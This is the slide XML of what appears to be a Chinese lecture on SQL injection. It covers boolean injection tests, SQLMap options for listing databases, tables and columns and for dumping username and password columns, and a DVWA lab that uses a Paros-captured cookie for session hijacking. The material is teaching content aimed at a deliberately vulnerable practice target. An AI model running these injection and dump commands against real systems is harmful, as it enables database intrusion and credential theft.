              <a:ext cx="9433048" cy="1409246"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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1979964" y="5269163"/>
            <a:ext cx="9417963" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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而与上一个永假式时，则会影响原逻辑，页面可能出错或跳转（这与设计者的设计有关）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979964" y="5834856"/>
            <a:ext cx="8921951" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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http://localhost/test.php?id=1 and 1=2</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，传递给后台数据库服务器的</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语句则变为：</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select * from category where id=1 and 1=2</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24" name="直接连接符 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2049270" y="5712775"/>
            <a:ext cx="8988617" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0050A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randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>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par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="14" presetClass="entr" presetSubtype="1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randombar(horizontal)">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3549055" y="2968253"/>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SQLMAP</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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2532843" y="864088"/>
              <a:ext cx="508859" cy="158614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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2053958" y="1402731"/>
              <a:ext cx="181442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en-US" altLang="zh-CN" sz="2400" b="1" kern="0"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SQLMap</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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="1453648"/>
            <a:ext cx="10657184" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">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是一款开源的命令行自动化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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注入工具</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开发</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而成，</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中系统已装有</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；而如果在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下使用，则需要安装</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环境。下面介绍</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最为常用的命令：</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5053525" y="2801948"/>
            <a:ext cx="2751702" cy="2974617"/>
            <a:chOff x="5053525" y="2801948"/>
            <a:chExt cx="2751702" cy="2974617"/>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最为常用的命令：</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 name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4854245" y="2928058"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="2801948"/>
            <a:ext cx="3888432" cy="394996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="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找到注入点</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矩形 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5583946" y="5589326"/>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文本框 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532831" y="5337578"/>
            <a:ext cx="4032448" cy="702773"/>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--current-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db</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显示当前数据库</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矩形 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605948" y="5237938"/>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文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8193571" y="3231450"/>
            <a:ext cx="3060340" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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–users</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列出数据库用户</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16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4750653" y="4189780"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1917107" y="3901982"/>
            <a:ext cx="2751700" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="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dbs</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列出数据库</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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908819" y="3516165"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908819" y="4986191"/>
            <a:ext cx="4128690" cy="702773"/>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--current-user</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当前数据库用户</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animBg="1"/>
      <p:bldP spid="43" grpId="0"/>
      <p:bldP spid="44" grpId="0" animBg="1"/>
      <p:bldP spid="45" grpId="0"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="19"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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2532843" y="864088"/>
              <a:ext cx="508859" cy="158614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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2053958" y="1402731"/>
              <a:ext cx="181442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en-US" altLang="zh-CN" sz="2400" b="1" kern="0"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SQLMap</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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="1453648"/>
            <a:ext cx="10657184" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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是一款开源的命令行自动化</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注入工具，用</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开发</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而成，</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中系统已装有</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；而如果在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下使用，则需要安装</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环境。下面介绍</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最为常用的命令：</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5053525" y="2801948"/>
            <a:ext cx="2751702" cy="2974617"/>
            <a:chOff x="5053525" y="2801948"/>
            <a:chExt cx="2751702" cy="2974617"/>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最为常用的命令：</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 name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4854245" y="2928058"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-339377" y="2648060"/>
            <a:ext cx="5184576" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="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--tables -D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数据库的表</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文本框 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="803803" y="5097300"/>
            <a:ext cx="4405001" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="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--columns -T "user" -D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数据库</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表的列</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矩形 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605948" y="5237938"/>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文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8301583" y="3110529"/>
            <a:ext cx="3599905" cy="1010549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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-u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--dump -C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id,username,password</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 “user” -D “</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16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317491" y="5337031"/>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908819" y="3516165"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7864332" y="5025680"/>
            <a:ext cx="4128690" cy="702773"/>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列出</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testdb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 库</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表的</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id,username,password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这几列的数据</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3" grpId="0"/>
      <p:bldP spid="45" grpId="0"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="19"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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2532843" y="864088"/>
              <a:ext cx="508859" cy="158614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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2053958" y="1402731"/>
              <a:ext cx="181442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具体实践</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4</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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="1453648"/>
            <a:ext cx="10657184" cy="1879505"/>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开放式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应用程序安全项目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 Web Application Security Project, OWASP)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是世界上最知名的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安全与数据库安全研究组织，该组织分别在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2007</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2013</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年统计过十大</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安全漏洞。我们</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基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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OWASP</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发布的开源虚拟镜像“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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OWASP Broken Web Applications VM”</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来演示如何寻找</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注入漏洞。</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86200" y="3621509"/>
            <a:ext cx="5086350"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600101"/>
            <a:ext cx="10657184" cy="1417840"/>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首先，在虚拟机加载该虚拟映像。启动该虚拟机后将显示其</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地址，在本机浏览器打开该地址即可访问，如下图所示，我们选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Damn Vulnerable Web Application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，通过用户名</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登录，选择</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 Injection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。同时，将网页左下端的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DVWA Security</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设置为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1312515" y="3400301"/>
            <a:ext cx="10233720" cy="27325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注入漏洞</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316807" y="3904357"/>
            <a:ext cx="10657184" cy="1879313"/>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接下来判断是否能够进行注入，</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通过“单引号”法进行测试</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，在提交栏里输入一个单引号，发现</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报错</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，错误信息为：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You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1</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初步认定可以注入</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接下来，我们通过</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进行自动化注入。</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1028775" y="1672109"/>
            <a:ext cx="11161240" cy="1620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4624437"/>
            <a:ext cx="10657184" cy="1417840"/>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意味着，要能访问</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页面，需要通过</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优先登录，登录后才可以访问。因此，需要获取登录权限才可以。但假定我们难以猜测得到用户口令和密码，但我们可以</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想办法获取其</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值，实现会话劫持。</a:t>
            </a:r>
            <a:endPar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Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2468935" y="447973"/>
            <a:ext cx="7596845" cy="381642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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172791" y="808013"/>
            <a:ext cx="4068452"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打开本地代理服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Paros</a:t>
            </a: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Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676847" y="1744117"/>
            <a:ext cx="8784976" cy="4119259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172791" y="916675"/>
            <a:ext cx="2088232"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dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>设置代理：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>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964879" y="1744117"/>
            <a:ext cx="8421886" cy="4536504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1208794" y="880021"/>
            <a:ext cx="1044116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在网页的输入框中，输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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123</a:t>
            </a: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，选择提交后，查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Paros</a:t>
            </a:r>
            <a:r>
              <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拦截到的数据包信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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180903" y="1744117"/>
            <a:ext cx="8308618" cy="4320480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1424819" y="1225986"/>
            <a:ext cx="10009112" cy="65247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http://192.168.32.134/dvwa/vulnerabilities/sqli/?id=2&amp;Submit=Submit </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íṡľíḍè-Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1424819" y="641849"/>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记录其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">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信息</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Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3044999" y="2614069"/>
            <a:ext cx="6480720" cy="4302584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="组合 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5202512" y="2072656"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1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721489" y="837929"/>
              <a:ext cx="141577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判定注入</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999039">
            <a:off x="9708651" y="3943273"/>
            <a:ext cx="2673277" cy="26732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2" presetClass="entr" presetSubtype="2" decel="6000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a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1244799" y="1032567"/>
            <a:ext cx="10229238" cy="1660434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1028775" y="3718875"/>
            <a:ext cx="11021604" cy="971727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 142"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1061735" y="5008377"/>
            <a:ext cx="11475398" cy="958549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5202512" y="2984102"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8"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567601" y="837929"/>
              <a:ext cx="1723549"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列举数据库</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999039">
            <a:off x="9780661" y="4007878"/>
            <a:ext cx="2673277" cy="26732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outVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="2" presetClass="entr" presetSubtype="2" decel="6000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202512" y="847355"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8"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875377" y="837929"/>
              <a:ext cx="110799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列举表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9" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1058702" y="1496843"/>
            <a:ext cx="11159441" cy="1183377"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 144"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2540943" y="2822753"/>
            <a:ext cx="8392141" cy="1179370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5202512" y="4297022"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16"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875377" y="837929"/>
              <a:ext cx="110799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列举列</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19" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755921" y="5053586"/>
            <a:ext cx="11439357" cy="115884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outVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>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outVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="16" presetClass="entr" presetSubtype="37"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outVertical)">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202512" y="847355"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8"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721489" y="837929"/>
              <a:ext cx="1415773"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列举数据</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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="956767" y="1712632"/>
            <a:ext cx="10591567" cy="1098060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 148"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1964879" y="3112269"/>
            <a:ext cx="8943308" cy="2857625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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9708651" y="3943273"/>
            <a:ext cx="2673277" cy="26732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outVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>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outVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="2" presetClass="entr" presetSubtype="2" decel="6000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60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盲注</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0783" y="1453648"/>
            <a:ext cx="10657184" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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是用于访问和处理数据库的标准的计算机语言。</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是二十世纪七十年代由</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IBM</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创建的，于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1992</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年作为国际标准纳入</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ANSI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ïṧḷïḓê-Straight Connector 5"/>
